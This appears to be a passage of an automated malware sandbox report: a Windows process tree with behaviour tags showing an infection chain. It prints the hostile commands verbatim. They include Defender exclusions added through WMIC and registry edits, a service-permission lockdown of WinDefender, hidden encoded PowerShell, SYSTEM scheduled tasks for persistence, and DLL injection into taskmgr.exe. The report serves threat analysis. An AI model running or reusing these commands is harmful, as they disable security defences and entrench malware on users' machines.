- Modifies boot configuration data using bcdedit
PID:1492

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
6⤵
- Executes dropped EXE
PID:2656

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:1564

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
- Executes dropped EXE
PID:2764

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:2616

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Launches sc.exe
PID:2596

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
PID:2132

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
PID:1600

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
PID:2668

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
PID:2168

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
PID:3048

C:\Users\Admin\Pictures\Ae6KcqZDG3RHyqUIPyDn6abJ.exe
"C:\Users\Admin\Pictures\Ae6KcqZDG3RHyqUIPyDn6abJ.exe"
3⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2972

C:\Users\Admin\Pictures\VlEvAYeyGWtNYpmsg8pkMJtj.exe
"C:\Users\Admin\Pictures\VlEvAYeyGWtNYpmsg8pkMJtj.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2424

C:\Users\Admin\AppData\Local\Temp\7zS56C7.tmp\Install.exe
.\Install.exe /sQwdidHh "385118" /S
4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:2348

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:2608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\blelkQh.exe\" em /sVsite_idvNQ 385118 /S" /V1 /F
5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2624

C:\Users\Admin\Pictures\YAS96WTmaOYBISF8paPzyxEg.exe
"C:\Users\Admin\Pictures\YAS96WTmaOYBISF8paPzyxEg.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2776

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
4⤵
- Executes dropped EXE
PID:880

C:\Windows\system32\msiexec.exe
"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"
5⤵
PID:984

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe
"ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"
5⤵
- Executes dropped EXE
PID:1752

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 824 -s 668
2⤵
PID:2660

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240418222124.log C:\Windows\Logs\CBS\CbsPersist_20240418222124.cab
1⤵
- Drops file in Windows directory
PID:2320

C:\Windows\system32\taskeng.exe
taskeng.exe {FA2269D9-F8B7-453F-B6AE-65668BCC4A4F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2416

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\blelkQh.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\blelkQh.exe em /sVsite_idvNQ 385118 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2244

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gWMDLQIWd" /SC once /ST 05:27:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1136

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gWMDLQIWd"
3⤵
PID:3032

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gWMDLQIWd"
3⤵
PID:620

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
3⤵
PID:3060

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
PID:1668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2680

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2936

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1068

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1992

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2744

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1740

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1472

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1000

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\ofqvFcNvzeRditbz\XPEjsHBj\jukrhudKuTrYNCEr.wsf"
3⤵
PID:2632

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\ofqvFcNvzeRditbz\XPEjsHBj\jukrhudKuTrYNCEr.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:2256

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2152

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2096

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1696

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1372

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2140

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1660

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2656

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1856

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1200

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2196

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:3036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2280

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1472

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2856

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2152

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2252

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2088

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1092

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1660

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2140

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
4⤵
PID:768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1296

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 02:18:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\BEppgGl.exe\" XT /ERsite_idGOU 385118 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2608

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
3⤵
PID:1200

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\BEppgGl.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\BEppgGl.exe XT /ERsite_idGOU 385118 /S
2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1756

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
3⤵
PID:1612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
3⤵
PID:2928

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
4⤵
PID:1068

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
PID:2604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
4⤵
PID:2884

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
5⤵
PID:1976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
6⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2188

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\VKEdXN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3052

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\DFdbEWv.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:1968

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qbSDwEgyNYPZlGA"
3⤵
PID:1132

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
3⤵
PID:2428

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\sdgKSdK.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:112

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\CUGkpjG.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:2744

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\LDXiXiN.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:2544

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\aiArkdJ.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:2916

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 14:11:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\NCfsxCwn\MvQmzuB.dll\",#1 /JGsite_idTkL 385118" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1588

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QhciBzJOokLnyYZub"
3⤵
PID:1352

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
3⤵
PID:1908

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\NCfsxCwn\MvQmzuB.dll",#1 /JGsite_idTkL 385118
2⤵
PID:576

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\NCfsxCwn\MvQmzuB.dll",#1 /JGsite_idTkL 385118
3⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3028

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
4⤵
PID:2120

C:\Windows\system32\taskeng.exe
taskeng.exe {2B0D4149-35FD-4D91-A505-6BEFFA77CECF} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
1⤵
PID:2480

